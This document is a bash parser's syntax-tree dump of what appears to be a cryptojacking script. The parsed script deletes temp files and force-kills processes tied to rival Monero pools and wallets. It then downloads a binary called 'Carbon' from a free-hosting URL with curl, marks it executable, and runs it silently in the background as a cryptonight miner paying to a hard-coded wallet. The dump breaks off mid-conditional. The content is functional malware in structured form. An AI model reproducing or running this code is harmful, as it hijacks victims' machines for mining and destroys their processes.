FunctionNode(lineno=23, pos=(13, 1556), parts=[
  ReservedwordNode(lineno=3, pos=(13, 21), word='function'),
  WordNode(lineno=3, pos=(22, 27), word='kills'),
  ReservedwordNode(lineno=3, pos=(27, 28), word='('),
  ReservedwordNode(lineno=3, pos=(28, 29), word=')'),
  CompoundNode(lineno=23, list=[
    ReservedwordNode(lineno=3, pos=(30, 31), word='{'),
    ListNode(lineno=23, pos=(33, 1555), parts=[
        CommandNode(lineno=4, pos=(33, 56), parts=[
          WordNode(lineno=4, pos=(33, 35), word='rm'),
          WordNode(lineno=4, pos=(36, 39), word='-rf'),
          WordNode(lineno=4, pos=(40, 56), word='/tmp/*index_bak*'),
        ]),
        OperatorNode(lineno=5, op='\n', pos=(56, 57)),
        CommandNode(lineno=5, pos=(58, 82), parts=[
          WordNode(lineno=5, pos=(58, 60), word='rm'),
          WordNode(lineno=5, pos=(61, 64), word='-rf'),
          WordNode(lineno=5, pos=(65, 82), word='/tmp/*httpd.conf*'),
        ]),
        OperatorNode(lineno=6, op='\n', pos=(82, 83)),
        CommandNode(lineno=6, pos=(84, 107), parts=[
          WordNode(lineno=6, pos=(84, 86), word='rm'),
          WordNode(lineno=6, pos=(87, 90), word='-rf'),
          WordNode(lineno=6, pos=(91, 107), word='/tmp/*httpd.conf'),
        ]),
        OperatorNode(lineno=7, op='\n', pos=(107, 108)),
        CommandNode(lineno=7, pos=(109, 131), parts=[
          WordNode(lineno=7, pos=(109, 111), word='rm'),
          WordNode(lineno=7, pos=(112, 115), word='-rf'),
          WordNode(lineno=7, pos=(116, 131), word='/tmp/a7b104c270'),
        ]),
        OperatorNode(lineno=8, op='\n', pos=(131, 132)),
        CommandNode(lineno=8, pos=(133, 151), parts=[
          WordNode(lineno=8, pos=(133, 138), word='pkill'),
          WordNode(lineno=8, pos=(139, 141), word='-9'),
          WordNode(lineno=8, pos=(142, 151), word='AnXqV.yam'),
        ]),
        OperatorNode(lineno=9, op='\n', pos=(151, 152)),
        PipelineNode(lineno=9, pos=(153, 231), parts=[
          CommandNode(lineno=9, pos=(153, 160), parts=[
            WordNode(lineno=9, pos=(153, 155), word='ps'),
            WordNode(lineno=9, pos=(156, 160), word='auxf'),
          ]),
          PipeNode(lineno=9, pipe='|', pos=(160, 161)),
          CommandNode(lineno=9, pos=(161, 173), parts=[
            WordNode(lineno=9, pos=(161, 165), word='grep'),
            WordNode(lineno=9, pos=(166, 168), word='-v'),
            WordNode(lineno=9, pos=(169, 173), word='grep'),
          ]),
          PipeNode(lineno=9, pipe='|', pos=(173, 174)),
          CommandNode(lineno=9, pos=(174, 200), parts=[
            WordNode(lineno=9, pos=(174, 178), word='grep'),
            WordNode(lineno=9, pos=(179, 200), word='mine.moneropool.com'),
          ]),
          PipeNode(lineno=9, pipe='|', pos=(200, 201)),
          CommandNode(lineno=9, pos=(201, 217), parts=[
            WordNode(lineno=9, pos=(201, 204), word='awk'),
            WordNode(lineno=9, pos=(205, 217), word='{print $2}'),
          ]),
          PipeNode(lineno=9, pipe='|', pos=(217, 218)),
          CommandNode(lineno=9, pos=(218, 231), parts=[
            WordNode(lineno=9, pos=(218, 223), word='xargs'),
            WordNode(lineno=9, pos=(224, 228), word='kill'),
            WordNode(lineno=9, pos=(229, 231), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=10, op='\n', pos=(231, 232)),
        PipelineNode(lineno=10, pos=(233, 315), parts=[
          CommandNode(lineno=10, pos=(233, 240), parts=[
            WordNode(lineno=10, pos=(233, 235), word='ps'),
            WordNode(lineno=10, pos=(236, 240), word='auxf'),
          ]),
          PipeNode(lineno=10, pipe='|', pos=(240, 241)),
          CommandNode(lineno=10, pos=(241, 253), parts=[
            WordNode(lineno=10, pos=(241, 245), word='grep'),
            WordNode(lineno=10, pos=(246, 248), word='-v'),
            WordNode(lineno=10, pos=(249, 253), word='grep'),
          ]),
          PipeNode(lineno=10, pipe='|', pos=(253, 254)),
          CommandNode(lineno=10, pos=(254, 284), parts=[
            WordNode(lineno=10, pos=(254, 258), word='grep'),
            WordNode(lineno=10, pos=(259, 284), word='xmr.crypto-pool.fr:8080'),
          ]),
          PipeNode(lineno=10, pipe='|', pos=(284, 285)),
          CommandNode(lineno=10, pos=(285, 301), parts=[
            WordNode(lineno=10, pos=(285, 288), word='awk'),
            WordNode(lineno=10, pos=(289, 301), word='{print $2}'),
          ]),
          PipeNode(lineno=10, pipe='|', pos=(301, 302)),
          CommandNode(lineno=10, pos=(302, 315), parts=[
            WordNode(lineno=10, pos=(302, 307), word='xargs'),
            WordNode(lineno=10, pos=(308, 312), word='kill'),
            WordNode(lineno=10, pos=(313, 315), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=11, op='\n', pos=(315, 316)),
        PipelineNode(lineno=11, pos=(317, 399), parts=[
          CommandNode(lineno=11, pos=(317, 324), parts=[
            WordNode(lineno=11, pos=(317, 319), word='ps'),
            WordNode(lineno=11, pos=(320, 324), word='auxf'),
          ]),
          PipeNode(lineno=11, pipe='|', pos=(324, 325)),
          CommandNode(lineno=11, pos=(325, 337), parts=[
            WordNode(lineno=11, pos=(325, 329), word='grep'),
            WordNode(lineno=11, pos=(330, 332), word='-v'),
            WordNode(lineno=11, pos=(333, 337), word='grep'),
          ]),
          PipeNode(lineno=11, pipe='|', pos=(337, 338)),
          CommandNode(lineno=11, pos=(338, 368), parts=[
            WordNode(lineno=11, pos=(338, 342), word='grep'),
            WordNode(lineno=11, pos=(343, 368), word='xmr.crypto-pool.fr:3333'),
          ]),
          PipeNode(lineno=11, pipe='|', pos=(368, 369)),
          CommandNode(lineno=11, pos=(369, 385), parts=[
            WordNode(lineno=11, pos=(369, 372), word='awk'),
            WordNode(lineno=11, pos=(373, 385), word='{print $2}'),
          ]),
          PipeNode(lineno=11, pipe='|', pos=(385, 386)),
          CommandNode(lineno=11, pos=(386, 399), parts=[
            WordNode(lineno=11, pos=(386, 391), word='xargs'),
            WordNode(lineno=11, pos=(392, 396), word='kill'),
            WordNode(lineno=11, pos=(397, 399), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=12, op='\n', pos=(399, 400)),
        PipelineNode(lineno=12, pos=(401, 477), parts=[
          CommandNode(lineno=12, pos=(401, 408), parts=[
            WordNode(lineno=12, pos=(401, 403), word='ps'),
            WordNode(lineno=12, pos=(404, 408), word='auxf'),
          ]),
          PipeNode(lineno=12, pipe='|', pos=(408, 409)),
          CommandNode(lineno=12, pos=(409, 421), parts=[
            WordNode(lineno=12, pos=(409, 413), word='grep'),
            WordNode(lineno=12, pos=(414, 416), word='-v'),
            WordNode(lineno=12, pos=(417, 421), word='grep'),
          ]),
          PipeNode(lineno=12, pipe='|', pos=(421, 422)),
          CommandNode(lineno=12, pos=(422, 446), parts=[
            WordNode(lineno=12, pos=(422, 426), word='grep'),
            WordNode(lineno=12, pos=(427, 446), word='zhuabcn@yahoo.com'),
          ]),
          PipeNode(lineno=12, pipe='|', pos=(446, 447)),
          CommandNode(lineno=12, pos=(447, 463), parts=[
            WordNode(lineno=12, pos=(447, 450), word='awk'),
            WordNode(lineno=12, pos=(451, 463), word='{print $2}'),
          ]),
          PipeNode(lineno=12, pipe='|', pos=(463, 464)),
          CommandNode(lineno=12, pos=(464, 477), parts=[
            WordNode(lineno=12, pos=(464, 469), word='xargs'),
            WordNode(lineno=12, pos=(470, 474), word='kill'),
            WordNode(lineno=12, pos=(475, 477), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=13, op='\n', pos=(477, 478)),
        PipelineNode(lineno=13, pos=(479, 552), parts=[
          CommandNode(lineno=13, pos=(479, 486), parts=[
            WordNode(lineno=13, pos=(479, 481), word='ps'),
            WordNode(lineno=13, pos=(482, 486), word='auxf'),
          ]),
          PipeNode(lineno=13, pipe='|', pos=(486, 487)),
          CommandNode(lineno=13, pos=(487, 499), parts=[
            WordNode(lineno=13, pos=(487, 491), word='grep'),
            WordNode(lineno=13, pos=(492, 494), word='-v'),
            WordNode(lineno=13, pos=(495, 499), word='grep'),
          ]),
          PipeNode(lineno=13, pipe='|', pos=(499, 500)),
          CommandNode(lineno=13, pos=(500, 521), parts=[
            WordNode(lineno=13, pos=(500, 504), word='grep'),
            WordNode(lineno=13, pos=(505, 521), word='monerohash.com'),
          ]),
          PipeNode(lineno=13, pipe='|', pos=(521, 522)),
          CommandNode(lineno=13, pos=(522, 538), parts=[
            WordNode(lineno=13, pos=(522, 525), word='awk'),
            WordNode(lineno=13, pos=(526, 538), word='{print $2}'),
          ]),
          PipeNode(lineno=13, pipe='|', pos=(538, 539)),
          CommandNode(lineno=13, pos=(539, 552), parts=[
            WordNode(lineno=13, pos=(539, 544), word='xargs'),
            WordNode(lineno=13, pos=(545, 549), word='kill'),
            WordNode(lineno=13, pos=(550, 552), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=14, op='\n', pos=(552, 553)),
        PipelineNode(lineno=14, pos=(554, 628), parts=[
          CommandNode(lineno=14, pos=(554, 561), parts=[
            WordNode(lineno=14, pos=(554, 556), word='ps'),
            WordNode(lineno=14, pos=(557, 561), word='auxf'),
          ]),
          PipeNode(lineno=14, pipe='|', pos=(561, 562)),
          CommandNode(lineno=14, pos=(562, 574), parts=[
            WordNode(lineno=14, pos=(562, 566), word='grep'),
            WordNode(lineno=14, pos=(567, 569), word='-v'),
            WordNode(lineno=14, pos=(570, 574), word='grep'),
          ]),
          PipeNode(lineno=14, pipe='|', pos=(574, 575)),
          CommandNode(lineno=14, pos=(575, 597), parts=[
            WordNode(lineno=14, pos=(575, 579), word='grep'),
            WordNode(lineno=14, pos=(580, 597), word='/tmp/a7b104c270'),
          ]),
          PipeNode(lineno=14, pipe='|', pos=(597, 598)),
          CommandNode(lineno=14, pos=(598, 614), parts=[
            WordNode(lineno=14, pos=(598, 601), word='awk'),
            WordNode(lineno=14, pos=(602, 614), word='{print $2}'),
          ]),
          PipeNode(lineno=14, pipe='|', pos=(614, 615)),
          CommandNode(lineno=14, pos=(615, 628), parts=[
            WordNode(lineno=14, pos=(615, 620), word='xargs'),
            WordNode(lineno=14, pos=(621, 625), word='kill'),
            WordNode(lineno=14, pos=(626, 628), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=15, op='\n', pos=(628, 629)),
        PipelineNode(lineno=15, pos=(629, 723), parts=[
          CommandNode(lineno=15, pos=(629, 648), parts=[
            WordNode(lineno=15, pos=(629, 643), word='\xe3\x80\x80\xe3\x80\x80\xe3\x80\x80\xe3\x80\x80ps'),
            WordNode(lineno=15, pos=(644, 648), word='auxf'),
          ]),
          PipeNode(lineno=15, pipe='|', pos=(648, 649)),
          CommandNode(lineno=15, pos=(649, 661), parts=[
            WordNode(lineno=15, pos=(649, 653), word='grep'),
            WordNode(lineno=15, pos=(654, 656), word='-v'),
            WordNode(lineno=15, pos=(657, 661), word='grep'),
          ]),
          PipeNode(lineno=15, pipe='|', pos=(661, 662)),
          CommandNode(lineno=15, pos=(662, 692), parts=[
            WordNode(lineno=15, pos=(662, 666), word='grep'),
            WordNode(lineno=15, pos=(667, 692), word='xmr.crypto-pool.fr:6666'),
          ]),
          PipeNode(lineno=15, pipe='|', pos=(692, 693)),
          CommandNode(lineno=15, pos=(693, 709), parts=[
            WordNode(lineno=15, pos=(693, 696), word='awk'),
            WordNode(lineno=15, pos=(697, 709), word='{print $2}'),
          ]),
          PipeNode(lineno=15, pipe='|', pos=(709, 710)),
          CommandNode(lineno=15, pos=(710, 723), parts=[
            WordNode(lineno=15, pos=(710, 715), word='xargs'),
            WordNode(lineno=15, pos=(716, 720), word='kill'),
            WordNode(lineno=15, pos=(721, 723), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=16, op='\n', pos=(723, 724)),
        PipelineNode(lineno=16, pos=(725, 807), parts=[
          CommandNode(lineno=16, pos=(725, 732), parts=[
            WordNode(lineno=16, pos=(725, 727), word='ps'),
            WordNode(lineno=16, pos=(728, 732), word='auxf'),
          ]),
          PipeNode(lineno=16, pipe='|', pos=(732, 733)),
          CommandNode(lineno=16, pos=(733, 745), parts=[
            WordNode(lineno=16, pos=(733, 737), word='grep'),
            WordNode(lineno=16, pos=(738, 740), word='-v'),
            WordNode(lineno=16, pos=(741, 745), word='grep'),
          ]),
          PipeNode(lineno=16, pipe='|', pos=(745, 746)),
          CommandNode(lineno=16, pos=(746, 776), parts=[
            WordNode(lineno=16, pos=(746, 750), word='grep'),
            WordNode(lineno=16, pos=(751, 776), word='xmr.crypto-pool.fr:7777'),
          ]),
          PipeNode(lineno=16, pipe='|', pos=(776, 777)),
          CommandNode(lineno=16, pos=(777, 793), parts=[
            WordNode(lineno=16, pos=(777, 780), word='awk'),
            WordNode(lineno=16, pos=(781, 793), word='{print $2}'),
          ]),
          PipeNode(lineno=16, pipe='|', pos=(793, 794)),
          CommandNode(lineno=16, pos=(794, 807), parts=[
            WordNode(lineno=16, pos=(794, 799), word='xargs'),
            WordNode(lineno=16, pos=(800, 804), word='kill'),
            WordNode(lineno=16, pos=(805, 807), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=17, op='\n', pos=(807, 808)),
        PipelineNode(lineno=17, pos=(816, 897), parts=[
          CommandNode(lineno=17, pos=(816, 823), parts=[
            WordNode(lineno=17, pos=(816, 818), word='ps'),
            WordNode(lineno=17, pos=(819, 823), word='auxf'),
          ]),
          PipeNode(lineno=17, pipe='|', pos=(823, 824)),
          CommandNode(lineno=17, pos=(824, 836), parts=[
            WordNode(lineno=17, pos=(824, 828), word='grep'),
            WordNode(lineno=17, pos=(829, 831), word='-v'),
            WordNode(lineno=17, pos=(832, 836), word='grep'),
          ]),
          PipeNode(lineno=17, pipe='|', pos=(836, 837)),
          CommandNode(lineno=17, pos=(837, 866), parts=[
            WordNode(lineno=17, pos=(837, 841), word='grep'),
            WordNode(lineno=17, pos=(842, 866), word='xmr.crypto-pool.fr:443'),
          ]),
          PipeNode(lineno=17, pipe='|', pos=(866, 867)),
          CommandNode(lineno=17, pos=(867, 883), parts=[
            WordNode(lineno=17, pos=(867, 870), word='awk'),
            WordNode(lineno=17, pos=(871, 883), word='{print $2}'),
          ]),
          PipeNode(lineno=17, pipe='|', pos=(883, 884)),
          CommandNode(lineno=17, pos=(884, 897), parts=[
            WordNode(lineno=17, pos=(884, 889), word='xargs'),
            WordNode(lineno=17, pos=(890, 894), word='kill'),
            WordNode(lineno=17, pos=(895, 897), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=18, op='\n', pos=(897, 898)),
        PipelineNode(lineno=18, pos=(906, 1060), parts=[
          CommandNode(lineno=18, pos=(906, 913), parts=[
            WordNode(lineno=18, pos=(906, 908), word='ps'),
            WordNode(lineno=18, pos=(909, 913), word='auxf'),
          ]),
          PipeNode(lineno=18, pipe='|', pos=(913, 914)),
          CommandNode(lineno=18, pos=(914, 926), parts=[
            WordNode(lineno=18, pos=(914, 918), word='grep'),
            WordNode(lineno=18, pos=(919, 921), word='-v'),
            WordNode(lineno=18, pos=(922, 926), word='grep'),
          ]),
          PipeNode(lineno=18, pipe='|', pos=(926, 927)),
          CommandNode(lineno=18, pos=(927, 1029), parts=[
            WordNode(lineno=18, pos=(927, 931), word='grep'),
            WordNode(lineno=18, pos=(932, 1029), word='42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe'),
          ]),
          PipeNode(lineno=18, pipe='|', pos=(1029, 1030)),
          CommandNode(lineno=18, pos=(1030, 1046), parts=[
            WordNode(lineno=18, pos=(1030, 1033), word='awk'),
            WordNode(lineno=18, pos=(1034, 1046), word='{print $2}'),
          ]),
          PipeNode(lineno=18, pipe='|', pos=(1046, 1047)),
          CommandNode(lineno=18, pos=(1047, 1060), parts=[
            WordNode(lineno=18, pos=(1047, 1052), word='xargs'),
            WordNode(lineno=18, pos=(1053, 1057), word='kill'),
            WordNode(lineno=18, pos=(1058, 1060), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=19, op='\n', pos=(1060, 1061)),
        PipelineNode(lineno=19, pos=(1062, 1227), parts=[
          CommandNode(lineno=19, pos=(1062, 1069), parts=[
            WordNode(lineno=19, pos=(1062, 1064), word='ps'),
            WordNode(lineno=19, pos=(1065, 1069), word='auxf'),
          ]),
          PipeNode(lineno=19, pipe='|', pos=(1069, 1070)),
          CommandNode(lineno=19, pos=(1070, 1082), parts=[
            WordNode(lineno=19, pos=(1070, 1074), word='grep'),
            WordNode(lineno=19, pos=(1075, 1077), word='-v'),
            WordNode(lineno=19, pos=(1078, 1082), word='grep'),
          ]),
          PipeNode(lineno=19, pipe='|', pos=(1082, 1083)),
          CommandNode(lineno=19, pos=(1083, 1196), parts=[
            WordNode(lineno=19, pos=(1083, 1087), word='grep'),
            WordNode(lineno=19, pos=(1088, 1196), word='4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8'),
          ]),
          PipeNode(lineno=19, pipe='|', pos=(1196, 1197)),
          CommandNode(lineno=19, pos=(1197, 1213), parts=[
            WordNode(lineno=19, pos=(1197, 1200), word='awk'),
            WordNode(lineno=19, pos=(1201, 1213), word='{print $2}'),
          ]),
          PipeNode(lineno=19, pipe='|', pos=(1213, 1214)),
          CommandNode(lineno=19, pos=(1214, 1227), parts=[
            WordNode(lineno=19, pos=(1214, 1219), word='xargs'),
            WordNode(lineno=19, pos=(1220, 1224), word='kill'),
            WordNode(lineno=19, pos=(1225, 1227), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=20, op='\n', pos=(1227, 1228)),
        PipelineNode(lineno=20, pos=(1229, 1383), parts=[
          CommandNode(lineno=20, pos=(1229, 1236), parts=[
            WordNode(lineno=20, pos=(1229, 1231), word='ps'),
            WordNode(lineno=20, pos=(1232, 1236), word='auxf'),
          ]),
          PipeNode(lineno=20, pipe='|', pos=(1236, 1237)),
          CommandNode(lineno=20, pos=(1237, 1249), parts=[
            WordNode(lineno=20, pos=(1237, 1241), word='grep'),
            WordNode(lineno=20, pos=(1242, 1244), word='-v'),
            WordNode(lineno=20, pos=(1245, 1249), word='grep'),
          ]),
          PipeNode(lineno=20, pipe='|', pos=(1249, 1250)),
          CommandNode(lineno=20, pos=(1250, 1352), parts=[
            WordNode(lineno=20, pos=(1250, 1254), word='grep'),
            WordNode(lineno=20, pos=(1255, 1352), word='46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg'),
          ]),
          PipeNode(lineno=20, pipe='|', pos=(1352, 1353)),
          CommandNode(lineno=20, pos=(1353, 1369), parts=[
            WordNode(lineno=20, pos=(1353, 1356), word='awk'),
            WordNode(lineno=20, pos=(1357, 1369), word='{print $2}'),
          ]),
          PipeNode(lineno=20, pipe='|', pos=(1369, 1370)),
          CommandNode(lineno=20, pos=(1370, 1383), parts=[
            WordNode(lineno=20, pos=(1370, 1375), word='xargs'),
            WordNode(lineno=20, pos=(1376, 1380), word='kill'),
            WordNode(lineno=20, pos=(1381, 1383), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=21, op='\n', pos=(1383, 1384)),
        PipelineNode(lineno=21, pos=(1392, 1474), parts=[
          CommandNode(lineno=21, pos=(1392, 1399), parts=[
            WordNode(lineno=21, pos=(1392, 1394), word='ps'),
            WordNode(lineno=21, pos=(1395, 1399), word='auxf'),
          ]),
          PipeNode(lineno=21, pipe='|', pos=(1399, 1400)),
          CommandNode(lineno=21, pos=(1400, 1412), parts=[
            WordNode(lineno=21, pos=(1400, 1404), word='grep'),
            WordNode(lineno=21, pos=(1405, 1407), word='-v'),
            WordNode(lineno=21, pos=(1408, 1412), word='grep'),
          ]),
          PipeNode(lineno=21, pipe='|', pos=(1412, 1413)),
          CommandNode(lineno=21, pos=(1413, 1443), parts=[
            WordNode(lineno=21, pos=(1413, 1417), word='grep'),
            WordNode(lineno=21, pos=(1418, 1443), word='stratum.f2pool.com:8888'),
          ]),
          PipeNode(lineno=21, pipe='|', pos=(1443, 1444)),
          CommandNode(lineno=21, pos=(1444, 1460), parts=[
            WordNode(lineno=21, pos=(1444, 1447), word='awk'),
            WordNode(lineno=21, pos=(1448, 1460), word='{print $2}'),
          ]),
          PipeNode(lineno=21, pipe='|', pos=(1460, 1461)),
          CommandNode(lineno=21, pos=(1461, 1474), parts=[
            WordNode(lineno=21, pos=(1461, 1466), word='xargs'),
            WordNode(lineno=21, pos=(1467, 1471), word='kill'),
            WordNode(lineno=21, pos=(1472, 1474), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=22, op='\n', pos=(1474, 1475)),
        PipelineNode(lineno=22, pos=(1483, 1554), parts=[
          CommandNode(lineno=22, pos=(1483, 1490), parts=[
            WordNode(lineno=22, pos=(1483, 1485), word='ps'),
            WordNode(lineno=22, pos=(1486, 1490), word='auxf'),
          ]),
          PipeNode(lineno=22, pipe='|', pos=(1490, 1491)),
          CommandNode(lineno=22, pos=(1491, 1503), parts=[
            WordNode(lineno=22, pos=(1491, 1495), word='grep'),
            WordNode(lineno=22, pos=(1496, 1498), word='-v'),
            WordNode(lineno=22, pos=(1499, 1503), word='grep'),
          ]),
          PipeNode(lineno=22, pipe='|', pos=(1503, 1504)),
          CommandNode(lineno=22, pos=(1504, 1521), parts=[
            WordNode(lineno=22, pos=(1504, 1508), word='grep'),
            WordNode(lineno=22, pos=(1509, 1521), word='xmrpool.eu'),
          ]),
          PipeNode(lineno=22, pipe='|', pos=(1522, 1523)),
          CommandNode(lineno=22, pos=(1524, 1540), parts=[
            WordNode(lineno=22, pos=(1524, 1527), word='awk'),
            WordNode(lineno=22, pos=(1528, 1540), word='{print $2}'),
          ]),
          PipeNode(lineno=22, pipe='|', pos=(1540, 1541)),
          CommandNode(lineno=22, pos=(1541, 1554), parts=[
            WordNode(lineno=22, pos=(1541, 1546), word='xargs'),
            WordNode(lineno=22, pos=(1547, 1551), word='kill'),
            WordNode(lineno=22, pos=(1552, 1554), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=23, op='\n', pos=(1554, 1555)),
      ]),
    ReservedwordNode(lineno=23, pos=(1555, 1556), word='}'),
  ], pos=(30, 1556)),
])
FunctionNode(lineno=34, pos=(1559, 2112), parts=[
  ReservedwordNode(lineno=26, pos=(1559, 1567), word='function'),
  WordNode(lineno=26, pos=(1568, 1579), word='downloadyam'),
  ReservedwordNode(lineno=26, pos=(1579, 1580), word='('),
  ReservedwordNode(lineno=26, pos=(1580, 1581), word=')'),
  CompoundNode(lineno=34, list=[
    ReservedwordNode(lineno=26, pos=(1582, 1583), word='{'),
    ListNode(lineno=34, pos=(1592, 2111), parts=[
        CommandNode(lineno=27, pos=(1592, 1600), parts=[
          WordNode(lineno=27, pos=(1592, 1594), word='cd'),
          WordNode(lineno=27, pos=(1595, 1600), word='/tmp/'),
        ]),
        OperatorNode(lineno=28, op='\n', pos=(1600, 1601)),
        CompoundNode(lineno=33, list=[
          IfNode(lineno=33, pos=(1602, 2110), parts=[
            ReservedwordNode(lineno=28, pos=(1602, 1604), word='if'),
            ListNode(lineno=28, pos=(1605, 1623), parts=[
                CommandNode(lineno=28, pos=(1605, 1622), parts=[
                  WordNode(lineno=28, pos=(1605, 1606), word='['),
                  WordNode(lineno=28, pos=(1607, 1608), word='!'),
                  WordNode(lineno=28, pos=(1609, 1611), word='-f'),
                  WordNode(lineno=28, pos=(1612, 1620), word='Carbon'),
                  WordNode(lineno=28, pos=(1621, 1622), word=']'),
                ]),
                OperatorNode(lineno=28, op=';', pos=(1622, 1623)),
              ]),
            ReservedwordNode(lineno=28, pos=(1623, 1627), word='then'),
            ListNode(lineno=30, pos=(1630, 1895), parts=[
                CommandNode(lineno=29, pos=(1630, 1684), parts=[
                  WordNode(lineno=29, pos=(1630, 1634), word='curl'),
                  WordNode(lineno=29, pos=(1635, 1675), word='https://letsweb.000webhostapp.com/Carbon'),
                  RedirectNode(lineno=29, output=
                    WordNode(lineno=29, pos=(1678, 1684), word='Carbon'), pos=(1676, 1684), type='>'),
                ]),
                OperatorNode(lineno=29, op='&&', pos=(1685, 1687)),
                CommandNode(lineno=29, pos=(1688, 1703), parts=[
                  WordNode(lineno=29, pos=(1688, 1693), word='chmod'),
                  WordNode(lineno=29, pos=(1694, 1696), word='+x'),
                  WordNode(lineno=29, pos=(1697, 1703), word='Carbon'),
                ]),
                OperatorNode(lineno=30, op='\n', pos=(1703, 1704)),
                CommandNode(lineno=30, pos=(1706, 1893), parts=[
                  WordNode(lineno=30, pos=(1706, 1714), word='./Carbon'),
                  WordNode(lineno=30, pos=(1715, 1717), word='-B'),
                  WordNode(lineno=30, pos=(1718, 1720), word='-a'),
                  WordNode(lineno=30, pos=(1721, 1732), word='cryptonight'),
                  WordNode(lineno=30, pos=(1733, 1735), word='-o'),
                  WordNode(lineno=30, pos=(1736, 1771), word='stratum+tcp://xmr.crypto-pool.fr:80'),
                  WordNode(lineno=30, pos=(1772, 1774), word='-u'),
                  WordNode(lineno=30, pos=(1775, 1870), word='42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe'),
                  WordNode(lineno=30, pos=(1871, 1873), word='-p'),
                  WordNode(lineno=30, pos=(1874, 1875), word='x'),
                  WordNode(lineno=30, pos=(1876, 1878), word='-R'),
                  WordNode(lineno=30, pos=(1879, 1880), word='1'),
                  RedirectNode(lineno=30, output=
                    WordNode(lineno=30, pos=(1884, 1893), word='/dev/null'), pos=(1881, 1893), type='&>>'),
                ]),
                OperatorNode(lineno=30, op='&', pos=(1894, 1895)),
              ]),
            ReservedwordNode(lineno=31, pos=(1897, 1901), word='else'),
            ListNode(lineno=32, pos=(1917, 2106), parts=[
                CommandNode(lineno=32, pos=(1917, 2104), parts=[
                  WordNode(lineno=32, pos=(1917, 1925), word='./Carbon'),
                  WordNode(lineno=32, pos=(1926, 1928), word='-B'),
                  WordNode(lineno=32, pos=(1929, 1931), word='-a'),
                  WordNode(lineno=32, pos=(1932, 1943), word='cryptonight'),
                  WordNode(lineno=32, pos=(1944, 1946), word='-o'),
                  WordNode(lineno=32, pos=(1947, 1982), word='stratum+tcp://xmr.crypto-pool.fr:80'),
                  WordNode(lineno=32, pos=(1983, 1985), word='-u'),
                  WordNode(lineno=32, pos=(1986, 2081), word='42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe'),
                  WordNode(lineno=32, pos=(2082, 2084), word='-p'),
                  WordNode(lineno=32, pos=(2085, 2086), word='x'),
                  WordNode(lineno=32, pos=(2087, 2089), word='-R'),
                  WordNode(lineno=32, pos=(2090, 2091), word='1'),
                  RedirectNode(lineno=32, output=
                    WordNode(lineno=32, pos=(2095, 2104), word='/dev/null'), pos=(2092, 2104), type='&>>'),
                ]),
                OperatorNode(lineno=32, op='&', pos=(2105, 2106)),
              ]),
            ReservedwordNode(lineno=33, pos=(2108, 2110), word='fi'),
          ]),
        ], pos=(1602, 2110)),
        OperatorNode(lineno=34, op='\n', pos=(2110, 2111)),
      ]),
    ReservedwordNode(lineno=34, pos=(2111, 2112), word='}'),
  ], pos=(1582, 2112)),
])
CommandNode(lineno=37, pos=(2115, 2120), parts=[
  WordNode(lineno=37, pos=(2115, 2120), word='kills'),
])
CommandNode(lineno=38, pos=(2121, 2169), parts=[
  AssignmentNode(lineno=38, pos=(2121, 2169), word='p=$(ps aux | grep Carbon | grep -v grep | wc -l)', parts=[
    CommandsubstitutionNode(command=
      PipelineNode(lineno=38, pos=(2125, 2168), parts=[
        CommandNode(lineno=38, pos=(2125, 2131), parts=[
          WordNode(lineno=38, pos=(2125, 2127), word='ps'),
          WordNode(lineno=38, pos=(2128, 2131), word='aux'),
        ]),
        PipeNode(lineno=38, pipe='|', pos=(2132, 2133)),
        CommandNode(lineno=38, pos=(2134, 2145), parts=[
          WordNode(lineno=38, pos=(2134, 2138), word='grep'),
          WordNode(lineno=38, pos=(2139, 2145), word='Carbon'),
        ]),
        PipeNode(lineno=38, pipe='|', pos=(2146, 2147)),
        CommandNode(lineno=38, pos=(2148, 2160), parts=[
          WordNode(lineno=38, pos=(2148, 2152), word='grep'),
          WordNode(lineno=38, pos=(2153, 2155), word='-v'),
          WordNode(lineno=38, pos=(2156, 2160), word='grep'),
        ]),
        PipeNode(lineno=38, pipe='|', pos=(2161, 2162)),
        CommandNode(lineno=38, pos=(2163, 2168), parts=[
          WordNode(lineno=38, pos=(2163, 2165), word='wc'),
          WordNode(lineno=38, pos=(2166, 2168), word='-l'),
        ]),
      ]), lineno=38, pos=(2123, 2169)),
  ]),
])
CompoundNode(lineno=45, list=[
  IfNode(lineno=45, pos=(2170, 2265), parts=[
    ReservedwordNode(lineno=39, pos=(2170, 2172), word='if'),
    ListNode(lineno=39, pos=(2173, 2188), parts=[
        CommandNode(lineno=39, pos=(2173, 2187), parts=[
          WordNode(lineno=39, pos=(2173, 2174), word='['),
          WordNode(lineno=39, pos=(2175, 2179), word='${p}', parts=[
            ParameterNode(lineno=39, pos=(2175, 2179), value='p'),
          ]),
          WordNode(lineno=39, pos=(2180, 2183), word='-eq'),
          WordNode(lineno=39, pos=(2184, 2185), word='1'),
          WordNode(lineno=39, pos=(2186, 2187), word=']'),
        ]),
        OperatorNode(lineno=39, op=';', pos=(2187, 2188)),
      ]),
